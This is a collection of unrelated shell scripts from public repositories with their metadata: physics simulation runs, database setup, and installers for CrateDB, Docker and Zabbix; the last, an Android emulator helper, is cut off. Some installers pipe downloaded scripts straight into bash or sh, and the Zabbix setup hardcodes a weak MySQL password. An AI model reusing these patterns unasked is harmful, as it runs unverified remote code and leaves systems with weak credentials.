echo "double A_208Tl = 2*31.5 ; double A_214Bi = 10*31.5 ; double A_222Rn = 0.15e-3*31.5e6 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",1\)
# measured bkg w/o Bi
rm "contaminations/contaminations.h"
echo "double A_208Tl = 54*31.5 ; double A_214Bi = 0 ; double A_222Rn = 0.15e-3*31.5e6 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",1\)
# measured bkg w Bi
rm "contaminations/contaminations.h"
echo "double A_208Tl = 54*31.5 ; double A_214Bi = 290*31.5 ; double A_222Rn = 0.15e-3*31.5e6 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",1\)
mv "InfluenceContaminations/results.txt" "InfluenceContaminations/results_Se_with_B.txt"
# no bkg
rm "contaminations/contaminations.h"
echo "double A_208Tl = 0 ; double A_214Bi = 0 ; double A_222Rn = 0 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",0\)
# nominal bkg
rm "contaminations/contaminations.h"
echo "double A_208Tl = 2*31.5 ; double A_214Bi = 10*31.5 ; double A_222Rn = 0.15e-3*31.5e6 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",0\)
# measured bkg w/o Bi
rm "contaminations/contaminations.h"
echo "double A_208Tl = 54*31.5 ; double A_214Bi = 0 ; double A_222Rn = 0.15e-3*31.5e6 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",0\)
# measured bkg w Bi
rm "contaminations/contaminations.h"
echo "double A_208Tl = 54*31.5 ; double A_214Bi = 290*31.5 ; double A_222Rn = 0.15e-3*31.5e6 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",0\)
mv "InfluenceContaminations/results.txt" "InfluenceContaminations/results_Se_without_B.txt"
cp "contaminations/contaminations_nominales.h" "contaminations/contaminations.h"
cp "EventSelection/Cuts_perso_nom_B.h" "EventSelection/Cuts.h"
|
SuperNEMO-DBD/AllAnalyses
|
Cloe/SensitivityStudy-master/script_contaminations_aucun.sh
|
Shell
|
gpl-3.0
| 2,204 |
#!/bin/bash
GAMEDB=pokopoko_Game
LOGDB=pokopoko_Log
for ((i = 1; i < 11; i++));do
if [ $i != 10 ];then
echo "CREATE DATABASE ${GAMEDB}0$i character set utf8;"
echo "CREATE DATABASE ${LOGDB}0$i character set utf8;"
mysql -u root ${GAMEDB}0$i < pokopoko_Game.sql
mysql -u root ${LOGDB}0$i < pokopoko_Log.sql
else
echo "CREATE DATABASE ${GAMEDB}$i character set utf8;"
echo "CREATE DATABASE ${LOGDB}$i character set utf8;"
mysql -u root ${GAMEDB}$i < pokopoko_Game.sql
mysql -u root ${LOGDB}$i < pokopoko_Log.sql
fi
done
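# (A shorter sketch, assuming bash and seq: zero-pad the suffix with printf
# instead of branching on i == 10:
#   for i in $(seq 1 10); do
#     n=$(printf '%02d' "$i")    # 01..09, then 10
#     mysql -u root "${GAMEDB}${n}" < pokopoko_Game.sql
#     mysql -u root "${LOGDB}${n}" < pokopoko_Log.sql
#   done
# )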
|
wapj/scripts
|
restore_reviewdb.sh
|
Shell
|
gpl-3.0
| 596 |
#!/bin/bash
LOG=/var/log/userdata/debian/$(basename ${0}).log
mkdir -p $(dirname ${LOG})
exec 1>${LOG} 2>&1
date
set
set -o verbose
set -o errtrace
set -o xtrace
cd /tmp
# CrateDB
bash -c "$(curl -L install.crate.io)"
echo done
exit 0
|
devopsomatic/aws
|
userdata/debian/cratedb.sh
|
Shell
|
gpl-3.0
| 239 |
#!/bin/bash
# OpenRA packaging script for versioned source tarball
if [ $# -ne "2" ]; then
echo "Usage: `basename $0` tag outputdir"
exit 1
fi
# Set the working dir to the location of this script
cd "$(dirname "$0")"
TAG="$1"
OUTPUTDIR="$2"
SRCDIR="$(pwd)/../.."
pushd ${SRCDIR} > /dev/null
make version VERSION="${TAG}"
git ls-tree HEAD --name-only -r -z | xargs -0 tar cvjf "${OUTPUTDIR}/OpenRA-${TAG}-source.tar.bz2"
popd > /dev/null
|
LipkeGu/OpenRA
|
packaging/source/buildpackage.sh
|
Shell
|
gpl-3.0
| 445 |
#!/bin/sh
if [ -z $DESTDIR ]; then
echo 'Compiling GSchema'
glib-compile-schemas "$MESON_INSTALL_PREFIX/share/glib-2.0/schemas"
if [ "$1" = "false" ] # Was it lib-only?
then
echo 'Updating icon cache'
gtk-update-icon-cache -qtf "$MESON_INSTALL_PREFIX/share/icons/hicolor"
echo 'Updating desktop database'
update-desktop-database -q "$MESON_INSTALL_PREFIX/share/applications"
fi
fi
|
TingPing/irc-client
|
meson_post_install.sh
|
Shell
|
gpl-3.0
| 396 |
#!/bin/sh
if ! command -v wget
then
apt-eole install wget
fi
if ! command -v git
then
apt-eole install git
fi
if ! command -v make
then
apt-eole install make
fi
if ! command -v pip
then
apt-eole install python-pip
fi
if [ ! -d /usr/lib/python2.7/dist-packages/yaml ]
then
apt install -y python-yaml
fi
if ! command -v docker
then
wget -qO- https://get.docker.com/ | sh
usermod -aG docker arun
systemctl start docker
fi
if ! command -v docker-compose
then
pip install docker-compose
fi
if [ ! -d /etc/systemd/system/docker.service.d ]
then
mkdir -p /etc/systemd/system/docker.service.d
fi
apt-get install -y bridge-utils
#snap
if ! command -v snap
then
apt install -y snapd
fi
if ! command -v snapcraft
then
apt install -y snapcraft
fi
#vagrant
if [ ! -d /usr/lib/virtualbox ]
then
apt install -y virtualbox virtualbox-dkms
fi
if ! command -v vagrant
then
apt install -y vagrant
fi
apt autoremove -y
#lcx
|
GggEole/eole-meta-conteneurs
|
scripts/installPaquets.sh
|
Shell
|
gpl-3.0
| 926 |
DOCKER_NAME=
DOCKER_IMAGE=
STOP_HTTP=
RUN_SH="xhost +localhost"
DOCKER_RUN="--device /dev/snd -v /tmp/.X11-unix/X0:/tmp/.X11-unix/X0"
|
RolandKujundzic/rkdocker
|
gui/iceweasel/config.sh
|
Shell
|
gpl-3.0
| 135 |
# '.' this from individual test.sh files
if diff -b expected result
then printf "PASSED: $PWD\n\n"
else printf "FAILED: $PWD\n\n"; exit 1
fi
|
dcwbrown/olang
|
src/test/confidence/testresult.sh
|
Shell
|
gpl-3.0
| 140 |
#!/usr/bin/env bash
w="3600"
n="3"
d="5"
u="`id -u`" || exit
[[ "$u" == "0" ]] || exec sudo env DISPLAY="$DISPLAY" DBUS_SESSION_BUS_ADDRESS="$DBUS_SESSION_BUS_ADDRESS" "$0" "$@" || exit
# [[ "$u" == "0" ]] || exec time sudo "$0" "$@" || exit
s="/sys/power/state"
p="/sys/class/power_supply/AC/online"
[[ -e "$p" ]] || exit
g=( "gnome-screensaver-command" "--lock" )
[[ "$SUDO_USER" ]] && g=( "su" "-c" "env DISPLAY='$DISPLAY' DBUS_SESSION_BUS_ADDRESS='$DBUS_SESSION_BUS_ADDRESS' ${g[*]}" "$SUDO_USER" )
rtcwaker() {
which rtcwake &>/dev/null && rtcwake -u "$@"
}
rtcalarm() {
rtcwaker -m show
}
rtcsleep() {
local r
rtcalarm || r="$?"
rtcwaker -m disable || r="$?"
return "${r:-"0"}"
}
rtcsleep
while true
do
i="$n"
while true
do
sleep "$d"
a="`< "$p"`" || exit
[[ "$a" == "1" ]] && break
[[ "$a" == "0" ]] || exit
[[ "$((--i))" == "0" ]] && break
done
[[ "$a" == "1" ]] && continue
rtcalarm
rtcwaker -m no -s "$w"
"${g[@]}"
echo -n "Sleeping at: " && date -u
pm-suspend || echo mem | tee "$s" || exit
echo -n "Resuming at: " && date -u
rtcsleep
xset dpms force off
done
|
datgao/miscutil
|
p.sh
|
Shell
|
gpl-3.0
| 1,117 |
#!/bin/sh
# export DISPLAY=:0 PULSE_SERVER=tcp:127.0.0.1:4712
#startxfce4 &> 2
|
redjoker/nexus9_chroot
|
graphics.sh
|
Shell
|
gpl-3.0
| 81 |
#!/bin/sh
tar -xjvf multichase-1.tar.bz2
mv multichase multichase-bin
cd multichase-bin
echo "--- Makefile 2016-12-29 01:46:00.387366591 +0000
+++ Makefile.new 2016-12-29 01:45:54.284206284 +0000
@@ -11,7 +11,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
-CFLAGS=-std=gnu99 -g -O2 -fomit-frame-pointer -fno-unroll-loops -Wall -Wstrict-prototypes -Wmissing-prototypes -Wshadow -Wmissing-declarations -Wnested-externs -Wpointer-arith -W -Wno-unused-parameter -Werror -pthread
+CFLAGS=-std=gnu99 -g -O2 -fomit-frame-pointer -fno-unroll-loops -Wall -Wstrict-prototypes -Wmissing-prototypes -Wshadow -Wmissing-declarations -Wnested-externs -Wpointer-arith -W -Wno-unused-parameter -pthread
LDFLAGS=-g -O2 -static -pthread
LDLIBS=-lrt
" | patch -p0
make
echo 0 > ~/test-exit-status
cd ~/
echo "#!/bin/sh
cd multichase-bin
./\$@ > \$LOG_FILE 2>&1
echo \$? > ~/test-exit-status" > multichase
chmod +x multichase
|
phoronix-test-suite/phoronix-test-suite
|
ob-cache/test-profiles/pts/multichase-1.0.2/install.sh
|
Shell
|
gpl-3.0
| 977 |
#!/usr/bin/env bash
# Aim: launch a functional test for the insilicut package
# Copyright (C) 2014 Institut National de la Recherche Agronomique (INRA)
# License: GPL-3+
# Author: Timothée Flutre
progVersion="1.0"
# Display the help on stdout.
# The format complies with help2man (http://www.gnu.org/s/help2man)
function help () {
msg="\`${0##*/}' launches a functional test for the insilicut package.\n"
msg+="\n"
msg+="Usage: ${0##*/} [OPTIONS] ...\n"
msg+="\n"
msg+="Options:\n"
msg+=" -h, --help\tdisplay the help and exit\n"
msg+=" -V, --version\toutput version information and exit\n"
msg+=" -v, --verbose\tverbosity level (0/default=1/2/3)\n"
msg+=" -i, --p2i\tabsolute path to the insilicut directory\n"
msg+=" -n, --noclean\tkeep temporary directory with all files\n"
msg+="\n"
msg+="Report bugs to <[email protected]>."
echo -e "$msg"
}
# Display version and license information on stdout.
function version () {
msg="${0##*/} ${progVersion}\n"
msg+="\n"
msg+="Copyright (C) 2014 Institut National de la Recherche Agronomique (INRA).\n"
msg+="License GPL-3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\n"
msg+="This is free software; see the source for copying conditions. There is NO\n"
msg+="warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msg+="\n"
msg+="Written by Timothée Flutre."
echo -e "$msg"
}
# http://www.linuxjournal.com/content/use-date-command-measure-elapsed-time
function timer () {
if [[ $# -eq 0 ]]; then
echo $(date '+%s')
else
local startRawTime=$1
endRawTime=$(date '+%s')
if [[ -z "$startRawTime" ]]; then startRawTime=$endRawTime; fi
elapsed=$((endRawTime - startRawTime)) # in sec
nbDays=$((elapsed / 86400))
nbHours=$(((elapsed / 3600) % 24))
nbMins=$(((elapsed / 60) % 60))
nbSecs=$((elapsed % 60))
printf "%01dd %01dh %01dm %01ds" $nbDays $nbHours $nbMins $nbSecs
fi
}
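# Usage sketch (mirrors the calls near the bottom of this script):
#   t0=$(timer); sleep 3; echo "elapsed: $(timer $t0)"   # -> elapsed: 0d 0h 0m 3s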
# Parse the command-line arguments.
# http://stackoverflow.com/a/4300224/597069
function parseCmdLine () {
getopt -T > /dev/null # portability check (say, Linux or Mac OS?)
if [ $? -eq 4 ]; then # GNU enhanced getopt is available
TEMP=`getopt -o hVv:i:n -l help,version,verbose:,p2i:,noclean \
-n "$0" -- "$@"`
else # original getopt is available (no long options, whitespace, sorting)
TEMP=`getopt hVv:i:n "$@"`
fi
if [ $? -ne 0 ]; then
echo "ERROR: "$(which getopt)" failed"
getopt -T > /dev/null
if [ $? -ne 4 ]; then
echo "did you use long options? they are not handled \
on your system, use -h for help"
fi
exit 2
fi
eval set -- "$TEMP"
while [ $# -gt 0 ]; do
case "$1" in
-h | --help) help; exit 0; shift;;
-V | --version) version; exit 0; shift;;
-v | --verbose) verbose=$2; shift 2;;
-i | --p2i) pathToInsilicut=$2; shift 2;;
-n | --noclean) clean=false; shift;;
--) shift; break;;
*) echo "ERROR: options parsing failed, use -h for help"; exit 1;;
esac
done
if [ -z "${pathToInsilicut}" ]; then
echo -e "ERROR: missing compulsory option --p2i\n"
help
exit 1
fi
if [ ! -d "${pathToInsilicut}" ]; then
echo -e "ERROR: can't find directory ${pathToInsilicut}\n"
help
exit 1
fi
}
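# Example invocation (hypothetical path):
#   ./test_func.bash --p2i /home/user/src/insilicut -v 2 --noclean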
function run () {
cwd=$(pwd)
cd "${pathToInsilicut}/tests"
# step 1 ------------------------------------------------------------------
if [ $verbose -gt "0" ]; then
echo -e "prepare input data..."
fi
if [ ! -f "${pathToInsilicut}/tests/TAIR10_chr1.fas" ]; then
if [ $verbose -gt "0" ]; then
echo -e "download chromosome 1 from A. thaliana..."
fi
wget ftp://ftp.arabidopsis.org/home/tair/Sequences/whole_chromosomes/TAIR10_chr1.fas
fi
echo -e ">ApeKI\nGCWGC" > ApeKI.fa
# step 2 ------------------------------------------------------------------
uniqId=$$ # process ID
testDir=tmp_test_${uniqId}
rm -rf ${testDir}
mkdir ${testDir}
cd ${testDir}
if [ $verbose -gt "0" ]; then echo "temp dir: "$(pwd); fi
# step 3 ------------------------------------------------------------------
if [ $verbose -gt "0" ]; then
echo -e "launch insilicut..."
fi
${pathToInsilicut}/scripts/insilicut.bash --gf ../TAIR10_chr1.fas \
--gn Atha --ef ../ApeKI.fa --en ApeKI -v $(expr ${verbose} - 1) \
--p2i ${pathToInsilicut}
# step 4 ------------------------------------------------------------------
if [ $verbose -gt "0" ]; then
echo -e "check outputs..."
fi
if [ $(zcat out_patman_Atha_ApeKI_e-0_g-0_a_frags_s-100_S-300.bed.gz | wc -l) != 5968 ]; then
echo -e "test failed!"
exit 1
else
echo -e "test passed!"
fi
# step 5 ------------------------------------------------------------------
cd ${cwd}
if $clean; then rm -rf "${pathToInsilicut}/tests/${testDir}"; fi
}
verbose=1
pathToInsilicut=""
clean=true
parseCmdLine "$@"
if [ $verbose -gt "0" ]; then
startTime=$(timer)
msg="START ${0##*/} $(date +"%Y-%m-%d") $(date +"%H:%M:%S")"
  msg+="\ncmd-line: $0 $*" # comment if an option takes a glob as argument
  msg+="\ncwd: $(pwd)"
  echo -e "$msg"
fi
run # run() uses the global variables set by parseCmdLine
if [ $verbose -gt "0" ]; then
msg="END ${0##*/} $(date +"%Y-%m-%d") $(date +"%H:%M:%S")"
  msg+=" ($(timer $startTime))"
echo $msg
fi
|
timflutre/insilicut
|
tests/test_func.bash
|
Shell
|
gpl-3.0
| 5,332 |
#!/bin/bash
ACV="2.86"
ARC=".tar.gz"
APN="sysvinit"
export ACV ARC APN
ACB=$APN-$ACV
export ACB
#
# Sysvinit-2.86
#
##########################################
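# NOTE (assumption): $LSB (build directory), $LSR (source/tarball directory)
# and $TC (extract command, e.g. "tar xzf") appear to be exported by the
# surrounding build system; this script is not standalone.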
cd $LSB
$TC $LSR/$ACB$ARC
cd $ACB
sed -i 's@Sending processes@& configured via /etc/inittab@g' \
src/init.c
make -C src
make -C src install
cat > /etc/inittab << "EOF"
# Begin /etc/inittab
id:3:initdefault:
si::sysinit:/etc/rc.d/init.d/rc sysinit
l0:0:wait:/etc/rc.d/init.d/rc 0
l1:S1:wait:/etc/rc.d/init.d/rc 1
l2:2:wait:/etc/rc.d/init.d/rc 2
l3:3:wait:/etc/rc.d/init.d/rc 3
l4:4:wait:/etc/rc.d/init.d/rc 4
l5:5:wait:/etc/rc.d/init.d/rc 5
l6:6:wait:/etc/rc.d/init.d/rc 6
ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now
su:S016:once:/sbin/sulogin
1:2345:respawn:/sbin/agetty tty1 9600
2:2345:respawn:/sbin/agetty tty2 9600
3:2345:respawn:/sbin/agetty tty3 9600
4:2345:respawn:/sbin/agetty tty4 9600
5:2345:respawn:/sbin/agetty tty5 9600
6:2345:respawn:/sbin/agetty tty6 9600
# End /etc/inittab
EOF
|
buswellj/code
|
AppOS-Linux/abs-7.0.2/bldsys/scripts32/chroot/sysvinit_p4.sh
|
Shell
|
gpl-3.0
| 971 |
#!/bin/bash
# This script is used to generate the previews needed by the mod
# It requires blender with the latest python API (2.6x is tested)
# A script that works with older blenders and, maybe, without python, is available in older commits.
# This script can also use pngcrush and imagemagick to reduce output size,
# please enable them if you want to push to the git repository of the mod.
# Pngcrush output will be written to .previews/pngcrush_output
# Warning: any file in .previews/ and skins/textures might be deleted without asking.
PNGCRUSH=true
IMAGEMAGICK=true
cd .previews
rm ../skins/textures/*_preview*.png # Remove all previous previews
blender -b skin_previews.blend --python-text "Generate previews" > /dev/null
if $IMAGEMAGICK
then echo "Stripping metadata from generated files..."
else echo "Moving files..."
fi
rm -rf output # remove any output from a previous run
mkdir -p output
for i in blender_out/character_*_00.png;
do
out_name=$(basename $i | sed -e 's/_00.png//g')
out_file=output/"$out_name"_preview.png
if $IMAGEMAGICK
then
convert -strip $i $out_file
else
mv $i $out_file
fi
done
for i in blender_out/character_*_01.png;
do
out_name=$(basename $i | sed -e 's/_01.png//g')
out_file=output/"$out_name"_preview_back.png
if $IMAGEMAGICK
then
convert -strip $i $out_file
else
mv $i $out_file
fi
done
if $PNGCRUSH
then
echo "Running pngcrush..."
pngcrush -d ../skins/textures/ output/*_preview*.png 2> pngcrush_output
else mv output/*_preview*.png ../skins/textures/
fi
echo "Done!"
|
linushsao/sky_islands_game-linus
|
mods/modmenu_linus/skins_linus/generate_previews.sh
|
Shell
|
gpl-3.0
| 1,520 |
#! /bin/bash
# Remove Oasis files
rm -rf configure libnewque_stubs.clib Makefile myocamlbuild.ml setup.data setup.ml _tags tmp
mkdir tmp
# Create new Oasis files
oasis setup
./configure
# Keep a copy of the stubs
cp tmp/libnewque_stubs.clib .
# Download rapidjson if missing
if [ ! -d "rapidjson" ]; then
echo 'Downloading rapidjson_v1.1.0'
wget -nv https://github.com/miloyip/rapidjson/archive/v1.1.0.tar.gz -O src/bindings/rapidjson_v1.1.0.tar.gz
tar xzf src/bindings/rapidjson_v1.1.0.tar.gz
mv rapidjson-1.1.0/include/rapidjson rapidjson
rm -rf rapidjson-1.1.0 src/bindings/rapidjson_v1.1.0.tar.gz
fi
echo 'Done'
|
bradstimpson/newque
|
scripts/setup.sh
|
Shell
|
mpl-2.0
| 630 |
#!/bin/bash
PROG=$1
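# NOTE: "-l" is the BSD/macOS time(1) flag that also reports rusage details,
# including the "maximum resident set size" line that grep keeps.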
eval "/usr/bin/time -l 2>&1 ./$PROG | grep maximum"
|
awf/Coconut
|
Scripts/memusg.sh
|
Shell
|
mpl-2.0
| 72 |
#!/bin/bash
################################################################################
#
# Script to install Zabbix Agent and Server on a Ubuntu 14.04 vanilla system
#
# Copyright Samuel Cozannet 2014
# Maintainer: Samuel Cozannet <[email protected]>
#
################################################################################
set -x
# Configuring default versions
VERSION="2.2"
DISTRIBUTION="ubuntu"
DIST="trusty"
APT_KEY="D13D58E479EA5ED4"
APT_SRV="keys.gnupg.net"
# Note: this password is substituted into the preseed files and MySQL grants below.
MYSQL_PASS="ubuntu"
START_DB="zabbix_ob.sql"
# START_DB="zabbix_full.sql"
### Pre requisite
# Using default repository for latest Zabbix binaries
echo "deb http://repo.zabbixzone.com/zabbix/${VERSION}/${DISTRIBUTION}/ ${DIST} main contrib non-free" | tee /etc/apt/sources.list.d/zabbix.list
apt-key adv --keyserver ${APT_SRV} --recv-keys ${APT_KEY}
# Adding the multiverse repos
echo "deb http://us.archive.ubuntu.com/ubuntu/ ${DIST} multiverse" | tee -a /etc/apt/sources.list.d/multiverse.list
echo "deb http://us.archive.ubuntu.com/ubuntu/ ${DIST}-updates multiverse" | tee -a /etc/apt/sources.list.d/multiverse.list
# Updating local repos
apt-get update -qq
# Compilation (uncomment if you want to build from sources)
# apt-get install -y -qq gcc libmagic1 build-essential pkg-config
# OpenIPMI
apt-get install -y -qq openipmi libopenipmi-dev
# CURL
apt-get install -y -qq libcurl4-openssl-dev
# SNMP
apt-get install -y -qq libsnmp-dev snmp snmptt snmpd libsnmp-base libsnmp-perl libsnmp30 libsnmp-mib-compiler-perl
# SNMP from multiverse (in case it fails will not remove other snmp packages)
apt-get install -y -qq snmp-mibs-downloader
# Jabber
apt-get install -y -qq libiksemel-dev libiksemel3 libiksemel-utils
# MySQL
apt-get install -y -qq mysql-client libmysqlclient15-dev
# SSL & SSH
apt-get install -y -qq libssl-dev libssh2-1-dev
# Networking & Stuff
apt-get install -y -qq fping wakeonlan ntp bc
# AMT Terminal
apt-get install -y -qq amtterm
sed -i.bak 's/^mibs\ \:/#\ mibs\ \:/' /etc/snmp/snmp.conf
# Stuff
apt-get install -y -qq htop openssl shellinabox eggdrop expect
# Install ncftp
apt-get install -y -qq ncftp
# Networking
apt-get install -y -qq tshark nmap
groupadd wireshark
usermod -a -G wireshark $USERNAME
chgrp wireshark /usr/bin/dumpcap
chmod 750 /usr/bin/dumpcap
setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap
# This line verifies the result. Uncomment if want to check
# getcap /usr/bin/dumpcap
# Note leaving the session is required. Will work after a reboot
# CVS & Code Systems
apt-get install -y -qq git bzr python-pip
### Final touch
echo "We are now ready to install Zabbix..."
echo
# Installing Zabbix
sed -i.bak "s/MYSQL_PASS/${MYSQL_PASS}/g" ./mysql_ob.preseed
debconf-set-selections ./mysql_ob.preseed
DEBIAN_FRONTEND=noninteractive apt-get install -y -qq --force-yes mysql-server-5.5
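# Hypothetical sketch of what mysql_ob.preseed contains before the sed
# substitution above (the preseed file itself is not part of this snippet):
#   mysql-server-5.5 mysql-server/root_password password MYSQL_PASS
#   mysql-server-5.5 mysql-server/root_password_again password MYSQL_PASS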
sed -i.bak "s/MYSQL_PASS/${MYSQL_PASS}/g" ./zabbix_ob.preseed
debconf-set-selections ./zabbix_ob.preseed
DEBIAN_FRONTEND=noninteractive apt-get install -y -qq --force-yes zabbix-server-mysql
apt-get install -y -qq zabbix-frontend-php zabbix-java-gateway zabbix-agent zabbix-get zabbix-sender php5-mysql
# Add the timezone to php.ini
sed -i.bak 's/^;date\.timezone\ =/date\.timezone\ = Europe\/Paris/' /etc/php5/apache2/php.ini
# Set default configuration
cp -f ./zabbix.conf_ob.php /etc/zabbix/web/zabbix.conf.php
service apache2 restart
# Import default DB
service zabbix-server stop
sleep 1
mysql -uroot -p${MYSQL_PASS} zabbix < ./${START_DB}
sleep 1
service zabbix-server start
# Prepare for agent MySQL querying
# Reference: http://blog.themilkyway.org/2013/11/how-to-monitor-mysql-using-the-new-zabbix-template-app-mysql/
mysql -uroot -p${MYSQL_PASS} -e"GRANT USAGE ON *.* TO 'zabbix'@'127.0.0.1' IDENTIFIED BY '${MYSQL_PASS}'"
mysql -uroot -p${MYSQL_PASS} -e"GRANT USAGE ON *.* TO 'zabbix'@'localhost' IDENTIFIED BY '${MYSQL_PASS}'"
# The agent also seems to require grants for the 'ubuntu' user
mysql -uroot -p${MYSQL_PASS} -e"GRANT USAGE ON *.* TO 'ubuntu'@'127.0.0.1'"
mysql -uroot -p${MYSQL_PASS} -e"GRANT USAGE ON *.* TO 'ubuntu'@'localhost'"
mysql -uroot -p${MYSQL_PASS} -e"FLUSH PRIVILEGES"
cp ./my.cnf /etc/zabbix/.my.cnf
service zabbix-agent restart
# Now copy External scripts
cp ./usr/lib/zabbix/externalscripts/* /usr/lib/zabbix/externalscripts/
cp ./usr/lib/zabbix/alertscripts/* /usr/lib/zabbix/alertscripts/
mv /usr/lib/zabbix/externalscripts/jujuapi.yaml /usr/lib/zabbix/externalscripts/.jujuapi.yaml
mv /usr/lib/zabbix/externalscripts/zabbixapi.yaml /usr/lib/zabbix/externalscripts/.zabbixapi.yaml
chmod +x /usr/lib/zabbix/externalscripts/*
chmod +x /usr/lib/zabbix/alertscripts/*
chown zabbix:zabbix /usr/lib/zabbix/externalscripts/*
chown zabbix:zabbix /usr/lib/zabbix/alertscripts/*
# Installing a local Zabbix API tool
pip install pyzabbix
|
SaMnCo/ob-zabbix
|
install-zabbix-server.sh
|
Shell
|
agpl-3.0
| 5,117 |
#!/bin/bash
VIRTUAL_MACHINE_IP=$(echo "$DOCKER_HOST" | grep -Eo '([0-9]*\.){3}[0-9]*')
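# Guard (a sketch, not in the original script): DOCKER_HOST may be unset when
# docker-machine is not in use, which would leave the IP empty.
if [ -z "$VIRTUAL_MACHINE_IP" ]; then
  echo "Could not extract an IP from DOCKER_HOST; is docker-machine running?" >&2
  exit 1
fi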
echo
echo "* This script is intended for Mac."
echo
echo "The server has to connect to the db container via the IP of the virtual machine."
echo "The virtual machine IP is: $VIRTUAL_MACHINE_IP"
echo
DATABASE_URL=postgres://smartbirds:secret@$VIRTUAL_MACHINE_IP:5432/smartbirds npm start
|
BspbOrg/smartbirds-server
|
mac-npm-run.sh
|
Shell
|
agpl-3.0
| 376 |
#!/usr/bin/dumb-init /bin/bash
. /env.sh
for var in ${!DEFAULT_KAM*}; do
t=${var/DEFAULT_/}
    if [ -z "${!t}" ]; then
echo "Using default for ${t}:${!var}"
eval ${t}=${!var}
export "${t}"
else
echo "Using override value for ${t}"
fi
done
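# Example (illustrative): with DEFAULT_KAM_PORT=5060 exported and KAM_PORT
# unset, the loop above exports KAM_PORT=5060; a pre-set KAM_PORT is kept.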
for var in ${!KAM_*}; do
if [[ $var == KAM_* && "${var}" != "KAM_DISPATCHER_ROUTES" ]]; then
if [[ $var == KAM_DEFINE_* && ${!var} != "false" ]]; then
echo "#!define ${var/KAM_DEFINE_/} \"${!var}\"" >> "/etc/kamailio/kamailio-local.cfg"
fi
fi
done
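# Example (illustrative): exporting KAM_DEFINE_WITH_TLS=yes appends
#   #!define WITH_TLS "yes"
# to /etc/kamailio/kamailio-local.cfg.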
exec "${@}"
|
mwolff44/pyfreebilling
|
compose/production/kamailio/run.sh
|
Shell
|
agpl-3.0
| 541 |
#!/bin/bash
# Copyright 2013,2014 Marko Dimjašević, Simone Atzeni, Ivo Ugrina, Zvonimir Rakamarić
#
# This file is part of maline.
#
# maline is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# maline is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with maline. If not, see <http://www.gnu.org/licenses/>.
ADB_PORT="$1"
ADB_SERVER_PORT="$2"
SH_SCRIPT="$3"
SH_SCRIPT_IN_ANDROID="$4"
STATUS_FILE=$MALINE/.emulator-$ADB_PORT
# Clean up upon exiting from the process
function __sig_func {
kill $ADB_PID &>/dev/null
adb -P $ADB_SERVER_PORT kill-server &>/dev/null
exit 1
}
die() {
echo >&2 "$@"
exit 1
}
function wait_for_emu {
COUNTER=0
COUNTER_LIMIT=2
EMU_READY=0
echo "0" > $STATUS_FILE
echo -n "Waiting for the device: "
CURR_TIME=$((`date +"%s"`))
TIME_TIMEOUT=$(($CURR_TIME + $EMU_TIMEOUT))
while [ "$EMU_READY" != "1" ] && [ "$CURR_TIME" -lt "$TIME_TIMEOUT" ]; do
echo -n "."
sleep 3s
if [ $COUNTER -eq $COUNTER_LIMIT ]; then
let COUNTER=0
adb -P $ADB_SERVER_PORT -e disconnect localhost:$ADB_PORT &>/dev/null
adb -P $ADB_SERVER_PORT kill-server &>/dev/null
adb -P $ADB_SERVER_PORT start-server &>/dev/null &
ADB_PID=$!
fi
adb -P $ADB_SERVER_PORT -e connect localhost:$ADB_PORT &>/dev/null
EMU_READY=`timeout 5 adb -P $ADB_SERVER_PORT -e -s localhost:$ADB_PORT shell getprop dev.bootcomplete 2>&1`
EMU_READY=${EMU_READY:0:1}
let COUNTER=COUNTER+1
CURR_TIME=$((`date +"%s"`))
done
if [ "$EMU_READY" = "1" ]; then
echo " ready"
echo "1" > $STATUS_FILE
else
echo " failed"
fi
}
# Set traps (SIGKILL cannot be caught, so no trap is installed for it)
trap __sig_func SIGQUIT
trap __sig_func SIGTERM
# Kill the adb server
adb -P $ADB_SERVER_PORT kill-server &>/dev/null
# the bracketed pattern keeps grep from matching its own command line
ADB_PID=`ps -ef | grep "[a]db -P $ADB_SERVER_PORT" | head -1 | awk -F" " '{print $2}' | tr "\n" " "`
kill $ADB_PID &>/dev/null
# Start an adb server
adb -P $ADB_SERVER_PORT start-server &>/dev/null &
ADB_PID=$!
# TODO: Change this parameter if ARM is ever to be supported again or
# if running on a slower machine
EMU_TIMEOUT=180
# Wait for the device
wait_for_emu
if [ "`cat $STATUS_FILE 2>/dev/null`" != "1" ]; then
exit 0
fi
# Push a patched version of Monkey to the device. We need to do this
# because we are using a prebuilt image of x86, which doesn't come
# with the patched version of Monkey. Do the same with a tiny shell
# script that starts the app and traces its system calls.
JAR="$ANDROID_SDK_ROOT/monkey/monkey.jar"
ODEX="$ANDROID_SDK_ROOT/monkey/monkey.odex"
[ -f $JAR ] || die "$JAR file does not exist. Use a custom build of Android SDK pointed to in the documentation."
[ -f $ODEX ] || die "$ODEX file does not exist. Use a custom build of Android SDK pointed to in the documentation."
echo -n "Pushing a patched version of Monkey... "
let COUNTER=0
OK=0
while [ $OK -eq 0 ] && [ "$COUNTER" -lt 3 ]; do
OK=1
adb -P $ADB_SERVER_PORT shell mount -o rw,remount /system &>/dev/null || OK=0
sleep 1
adb -P $ADB_SERVER_PORT push $JAR /system/framework &>/dev/null || OK=0
adb -P $ADB_SERVER_PORT push $ODEX /system/framework &>/dev/null || OK=0
adb -P $ADB_SERVER_PORT push $SH_SCRIPT $SH_SCRIPT_IN_ANDROID &>/dev/null || OK=0
